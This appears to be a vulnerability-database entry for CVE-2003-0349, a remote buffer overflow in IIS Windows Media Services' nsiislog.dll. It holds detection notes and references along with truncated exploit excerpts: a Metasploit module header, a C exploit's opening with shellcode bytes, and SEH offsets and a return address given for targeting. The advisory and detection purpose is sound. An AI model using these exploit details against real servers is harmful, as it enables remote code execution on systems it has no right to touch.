CVE-2003-0349
Published 2003-07-24
CVE-2003-0349: Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services…
Priority: P3 · 53 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available · EPSS: 82.54% (99.6th percentile)
Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll.
Detection & IOCs (extracted from sources)
- bytes: \xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x81\xeb\x4d\x43\x22\x11
- Detect exploitation attempts by monitoring for large HTTP POST requests to /scripts/nsiislog.dll with a User-Agent of NSPlayer/* and a Pragma header containing xClientGUID.
- The exploit buffer begins with the header value 'MX_STATS_LogLine: ' followed by a large padding block; detect this string in POST body content to nsiislog.dll.
- The Metasploit module checks for the string 'NetShow ISAPI' in the response body to confirm the vulnerable endpoint is present.
- The exploit payload space is 1024 bytes with bad characters \x00\x2b\x26\x3d\x25\x0a\x0d\x20; use these constraints when writing shellcode-detection signatures.
- SEH overwrite offsets for targeting: Windows 2000 pre-MS03-019 at offset 9988, post-MS03-019 at offset 14088; Windows XP pre-MS03-019 at offset 9992.
- The exploit sends a POST body exceeding 16384 bytes (buffer created as rand_text_alphanumeric(256)*64) to trigger the SEH overflow; alert on POST requests to nsiislog.dll with Content-Length above 16000.
- The module also works against the 'patched' MS03-019 version of nsiislog.dll, meaning MS03-019 patched systems remain exploitable and should not be considered fully remediated until MS03-022 is applied.
- The default target in the Metasploit module is 'Brute Force' (target index 0), meaning exploitation attempts may cycle through multiple SEH offsets and return addresses rather than using a single fixed value.
- The standalone exploit hardcodes the return address 0x40F01333 for Windows 2000 nsiislog.dll version 4.1.0.3917; different DLL versions use different offsets (e.g., 4.1.0.3931 uses offset 14092).
No detection rules found.
Exploit-DB · 2010-07-25
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
---
```ruby
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Class declaration and initialize() header restored; the page's copy
# lost them in extraction. The listing is truncated below.
class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
			'Description'    => %q{
					This exploits a buffer overflow found in the nsiislog.dll
				ISAPI filter that comes with Windows Media Server. This
				module will also work against the 'patched' MS03-019
				version. This vulnerability was addressed by MS03-022.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LI
```
Exploit-DB · 2003-07-01
Microsoft Windows Media Services - Remote (MS03-022)
---
```c
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker //tN [The N0b0D1eS]

// Header names were stripped from the page's copy (angle brackets lost in
// extraction); the standard headers below are restored. Listing is truncated.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif

char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" // for debugging
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x
```
Exploit-DB · 2003-06-25
Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/8035/info
Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.
Metasploit
MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=105665030925504&w=2
- http://secunia.com/advisories/9115
- http://securitytracker.com/id?1007059
- http://www.kb.cert.org/vuls/id/113716
- http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0306&L=NTBUGTRAQ&P=R4563
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-022
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A938